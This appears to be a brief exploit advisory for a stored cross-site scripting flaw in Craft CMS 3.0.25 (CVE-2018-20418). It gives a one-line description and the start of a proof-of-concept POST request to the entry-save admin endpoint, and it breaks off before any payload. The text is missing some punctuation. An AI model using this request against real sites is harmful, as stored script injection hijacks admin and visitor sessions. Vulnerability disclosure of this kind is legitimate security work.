Craft CMS 3.0.25 - Cross-Site Scripting Vulnerability
Craft-CMS-3025 - Cross-Site-Scripting
Craft CMS 3025 - Cross-Site Scripting Vulnerability
CVE-CVE-2018-20418
cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2018-20418
Proof of Concept
Allows it to run a Cross-Site Scripting by saving a new title from the console tab
POST /admin-panel-path/indexphp?p=admin/actions/entries/save-entry HTTP/11
Host: IP:PORT
User-Agent: M